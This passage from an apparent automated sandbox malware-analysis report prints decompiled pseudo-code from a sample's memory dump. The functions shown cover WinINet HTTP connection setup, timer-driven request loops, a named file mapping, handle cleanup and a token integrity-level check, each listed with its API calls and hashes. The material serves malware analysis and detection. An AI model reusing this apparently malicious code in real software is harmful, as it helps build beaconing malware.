						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x008c7b59
0x008c7b59
0x008c7b64
0x008c7b6b
0x008c7b73
0x008c7b7d
0x008c7b83
0x008c7b96
0x008c7ba6
0x008c7b98
0x008c7b9b
0x008c7ba0
0x008c7ba0
0x008c7b96
0x008c7bb6
0x008c7bbc
0x008c7bc1
0x008c7caa
0x00000000
0x008c7bdc
0x008c7bdf
0x008c7bf2
0x008c7bf8
0x008c7bfd
0x008c7c25
0x008c7c38
0x008c7c42
0x008c7c45
0x008c7c4b
0x008c7c50
0x00000000
0x00000000
0x008c7c54
0x008c7c60
0x008c7c71
0x008c7c73
0x008c7c84
0x008c7c84
0x008c7c94
0x00000000
0x008c7ca6
0x00000000
0x008c7ca6
0x00000000
0x00000000
0x00000000
0x008c7bfd

APIs

lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 008C7B6B

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 008C7B8E
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 008C7BB6
InternetSetStatusCallback.WININET(00000000,008C7AEE), ref: 008C7BCD
ResetEvent.KERNEL32(?), ref: 008C7BDF
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 008C7BF2
GetLastError.KERNEL32 ref: 008C7BFF
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 008C7C45
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 008C7C63
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 008C7C84
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 008C7C90
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 008C7CA0
GetLastError.KERNEL32 ref: 008C7CAA

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: 6d577529c2dee720c8ba780dd6b2016df0a12e1088e10a47ac765ce625b57496
Instruction ID: dc6bfac20577d7feebf200ec280b0a50fd2a5d63847a2c1ae63d04427d1c9567
Opcode Fuzzy Hash: 6d577529c2dee720c8ba780dd6b2016df0a12e1088e10a47ac765ce625b57496
Instruction Fuzzy Hash: FC416771500608BFD7219FA5DD4CE6B7BB9FB84B14F14892DF503E21A0E631EA04CE20

Uniqueness

Uniqueness Score: -1.00%

Function 008C7F95 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E008C7F95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x8c0000;
				_t115 = _t139[3] + 0x8c0000;
				_t131 = _t139[4] + 0x8c0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x8c0000;
				_v16 = _t139[5] + 0x8c0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x8c0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x8ca1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x8ca1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x8ca1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x8ca1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x8ca1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x8ca1b8; // 0x0
										 *_t102 = _t125;
										 *0x8ca1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x8ca1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x008c7fa4
0x008c7fba
0x008c7fc0
0x008c7fc2
0x008c7fc7
0x008c7fcd
0x008c7fd2
0x008c7fd5
0x008c7fe3
0x008c7fea
0x008c7fed
0x008c7ff0
0x008c7ff1
0x008c7ff4
0x008c7ff7
0x008c7ffa
0x008c7fff
0x008c800e
0x00000000
0x008c8014
0x008c801e
0x008c8028
0x008c802d
0x008c802f
0x008c8039
0x008c803c
0x008c803f
0x008c8045
0x008c8047
0x008c8047
0x008c804a
0x008c804d
0x008c8052
0x008c8056
0x008c8069
0x008c806b
0x008c8113
0x008c8113
0x008c811a
0x008c811d
0x008c8127
0x008c8127
0x008c812b
0x008c81a9
0x008c81ac
0x008c81ae
0x008c81ae
0x008c81b5
0x008c81b7
0x008c81c1
0x008c81c4
0x008c81c7
0x008c81c7
0x00000000
0x008c812d
0x008c8130
0x008c815e
0x008c8168
0x008c816c
0x008c8174
0x008c8177
0x008c817e
0x008c8188
0x008c8188
0x008c818c
0x008c8191
0x008c81a0
0x008c81a6
0x008c81a6
0x008c818c
0x00000000
0x008c8137
0x008c813a
0x008c8142
0x008c8157
0x008c815c
0x00000000
0x00000000
0x008c815c
0x00000000
0x008c8142
0x008c8130
0x008c812b
0x008c8071
0x008c8078
0x008c8088
0x008c808b
0x008c8091
0x008c8095
0x008c80d8
0x008c80e4
0x008c810d
0x008c80e6
0x008c80ea
0x008c80f0
0x008c80f8
0x008c80fa
0x008c80fd
0x008c8103
0x008c8105
0x008c8105
0x008c80f8
0x008c80ea
0x00000000
0x008c80e4
0x008c809d
0x008c80a0
0x008c80a7
0x008c80b7
0x008c80ba
0x008c80ca
0x00000000
0x008c80d0
0x008c80b1
0x008c80b5
0x00000000
0x00000000
0x00000000
0x008c80b5
0x008c8082
0x008c8086
0x00000000
0x00000000
0x00000000
0x008c8086
0x008c805f
0x008c8063
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008C800E
LoadLibraryA.KERNELBASE(?), ref: 008C808B
GetLastError.KERNEL32 ref: 008C8097
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 008C80CA

Strings

$, xrefs: 008C7FE3

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 793a28ecb7b81f11812a2d444d0751a23576a62c6e0990670200281a93216011
Instruction ID: 24dbe70d8737b1f8c916f480af669feefbf596563ed6f1c9c0f144f136302204
Opcode Fuzzy Hash: 793a28ecb7b81f11812a2d444d0751a23576a62c6e0990670200281a93216011
Instruction Fuzzy Hash: A681F471A40609EFDB24CFA8D884FAAB7F5FB58314F18802EE915E7250EB70E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008C517A Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E008C517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x8ca2e0);
					_v76 = 0;
					_v80 = 0;
					L008C82AA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x8ca30c; // 0x18c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x8ca2ec = 5;
						} else {
							_t69 = E008C61FE(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x8ca300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E008C64A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E008C6821(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x8ca2e4);
							goto L21;
						} else {
							__eflags =  *0x8ca2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E008C14C6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x8ca2e8);
								L21:
								L008C82AA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x8ca2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x008c517a
0x008c5190
0x008c5194
0x008c5199
0x008c51a0
0x008c51a6
0x008c51ac
0x008c5333
0x008c51b2
0x008c51b2
0x008c51b4
0x008c51b9
0x008c51ba
0x008c51c0
0x008c51c4
0x008c51c8
0x008c51d6
0x008c51e4
0x008c51e8
0x008c51ea
0x008c51f7
0x008c5203
0x008c5205
0x008c520b
0x008c5214
0x008c521f
0x008c521f
0x008c5216
0x008c5216
0x008c521d
0x00000000
0x00000000
0x008c521d
0x008c5229
0x00000000
0x008c522d
0x008c5232
0x008c523d
0x008c523d
0x008c5245
0x008c524b
0x008c5253
0x008c525c
0x008c5263
0x008c5267
0x008c526c
0x008c5272
0x00000000
0x00000000
0x008c5274
0x008c5278
0x008c527f
0x00000000
0x008c5281
0x008c5291
0x008c5291
0x00000000
0x008c52c2
0x008c52c2
0x008c52c7
0x008c52e6
0x008c52e8
0x008c52ed
0x008c52ee
0x00000000
0x008c52c9
0x008c52c9
0x008c52cf
0x00000000
0x008c52d1
0x008c52d1
0x008c52d6
0x008c52d8
0x008c52dd
0x008c52de
0x008c52f4
0x008c52f4
0x008c52fc
0x008c530a
0x008c530e
0x008c531a
0x008c531c
0x008c5320
0x008c5322
0x00000000
0x008c5328
0x00000000
0x008c5328
0x008c5322
0x008c52cf
0x00000000
0x008c52c7
0x008c5295
0x008c5297
0x008c529b
0x008c529c
0x008c529c
0x008c52a0
0x008c52aa
0x008c52aa
0x008c52b0
0x008c52b3
0x008c52b3
0x008c52ba
0x008c52ba
0x008c5341
0x00000000

APIs

memset.NTDLL ref: 008C5194
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 008C51A0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 008C51C8
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 008C51E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,008C1273,?), ref: 008C5203
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,008C1273,?,00000000), ref: 008C52AA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,008C1273,?,00000000,?,?), ref: 008C52BA
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 008C52F4
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 008C530E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 008C531A

Part of subcall function 008C61FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,013093D8,00000000,?,74D0F710,00000000,74D0F730), ref: 008C624D
Part of subcall function 008C61FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01309410,?,00000000,30314549,00000014,004F0053,013093CC), ref: 008C62EA
Part of subcall function 008C61FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,008C521B), ref: 008C62FC

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,008C1273,?,00000000,?,?), ref: 008C532D

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 21f2bbff45a5ee7d00026c2768cb34e1acf84617dee5c040bfcb3ac9a06f9723
Instruction ID: 4770afd45919e93d42640c75515807585d9b55fd346db1f1b7452d326fc83580
Opcode Fuzzy Hash: 21f2bbff45a5ee7d00026c2768cb34e1acf84617dee5c040bfcb3ac9a06f9723
Instruction Fuzzy Hash: 30514A71508724AFCB109F559C48EABBBF8FB89324F104A1EF8A9D2261D770D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008C60A1 Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E008C60A1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L008C82A4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x8ca348; // 0xa3d5a8
				_t5 = _t13 + 0x8cb87a; // 0x1308e22
				_t6 = _t13 + 0x8cb594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L008C7F0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x8ca34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x008c60a1
0x008c60a9
0x008c60ad
0x008c60b3
0x008c60b8
0x008c60bd
0x008c60c0
0x008c60c3
0x008c60c8
0x008c60c9
0x008c60cc
0x008c60d1
0x008c60d8
0x008c60e2
0x008c60e4
0x008c60e5
0x008c60e8
0x008c6104
0x008c610a
0x008c610e
0x008c615c
0x008c6110
0x008c611d
0x008c612d
0x008c6135
0x008c6147
0x008c614b
0x00000000
0x00000000
0x008c6137
0x008c613a
0x008c613f
0x008c6141
0x008c6141
0x008c611f
0x008c6121
0x008c614d
0x008c614e
0x008c614e
0x008c611d
0x008c6163

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,008C113B,?,?,4D283A53,?,?), ref: 008C60AD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 008C60C3
_snwprintf.NTDLL ref: 008C60E8
CreateFileMappingW.KERNELBASE(000000FF,008CA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 008C6104
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,008C113B,?,?,4D283A53,?), ref: 008C6116
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 008C612D
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,008C113B,?,?,4D283A53), ref: 008C614E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,008C113B,?,?,4D283A53,?), ref: 008C6156

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: bad786c6dfc98ec722d62aeca1c1a0c1b4681a278e3bad6a644ce0f9df08291c
Instruction ID: ef301b25feefe1c0ad26d7c3a966ff54247fd516b6b0ddeb11e4e692f2f80ffd
Opcode Fuzzy Hash: bad786c6dfc98ec722d62aeca1c1a0c1b4681a278e3bad6a644ce0f9df08291c
Instruction Fuzzy Hash: 3621C372A00608FBC7119B64CC09F9E77B9FF84755F250066F505E7291EA70D915CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008C70E7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E008C70E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E008C2129(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E008C789E(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E008C789E(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E008C789E(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E008C789E(_t46);
				}
				return _t24;
			}

0x008c70e7
0x008c70e7
0x008c70e9
0x008c70eb
0x008c70f2
0x008c70f9
0x008c70f9
0x008c70fe
0x008c7101
0x008c7108
0x008c7111
0x008c7115
0x008c711a
0x008c711a
0x008c711c
0x008c7121
0x008c7125
0x008c712a
0x008c712a
0x008c712c
0x008c7131
0x008c7135
0x008c713a
0x008c713a
0x008c713c
0x008c7147
0x008c714a
0x008c714a
0x008c714c
0x008c7151
0x008c7154
0x008c7154
0x008c7156
0x008c715d
0x008c7160
0x008c7165
0x008c7168
0x008c7168
0x008c716b
0x008c7170
0x008c7173
0x008c7173
0x008c7178
0x008c717c
0x008c717f
0x008c717f
0x008c7184
0x008c7189
0x00000000
0x008c718c
0x008c7193

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 008C7115
InternetCloseHandle.WININET(?), ref: 008C711A
InternetSetStatusCallback.WININET(?,00000000), ref: 008C7125
InternetCloseHandle.WININET(?), ref: 008C712A
InternetSetStatusCallback.WININET(?,00000000), ref: 008C7135
InternetCloseHandle.WININET(?), ref: 008C713A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,008C5DA7,?,?,74CF81D0,00000000,00000000), ref: 008C714A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,008C5DA7,?,?,74CF81D0,00000000,00000000), ref: 008C7154

Part of subcall function 008C2129: WaitForMultipleObjects.KERNEL32(00000002,008C7C1D,00000000,008C7C1D,?,?,?,008C7C1D,0000EA60), ref: 008C2144

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 137e5dca125dac62263fbc68716b0949f406f13a0d08f3f946a0e1a3ad8e9ed4
Instruction ID: e9946b207ae4d68e53149bbb6ffbe2defa3bc27d7dea85e3d521ffb52b0b77ea
Opcode Fuzzy Hash: 137e5dca125dac62263fbc68716b0949f406f13a0d08f3f946a0e1a3ad8e9ed4
Instruction Fuzzy Hash: 6D11B376604648ABC630AEAAEC88D1BBBBDFB453103690D2EF186D3651C735FC448A65

Uniqueness

Uniqueness Score: -1.00%

Function 008C578B Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008C578B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x8ca2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E008C7A71(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E008C789E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x008c5798
0x008c579f
0x008c57a6
0x008c57ba
0x008c57c5
0x008c57dd
0x008c57ea
0x008c57ed
0x008c57f2
0x008c57fd
0x008c5801
0x008c5810
0x008c5814
0x008c5830
0x008c5830
0x008c5834
0x008c5834
0x008c5839
0x008c583d
0x008c5843
0x008c5844
0x008c584b
0x008c5851

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 008C57BD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 008C57DD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 008C57ED
CloseHandle.KERNEL32(00000000), ref: 008C583D

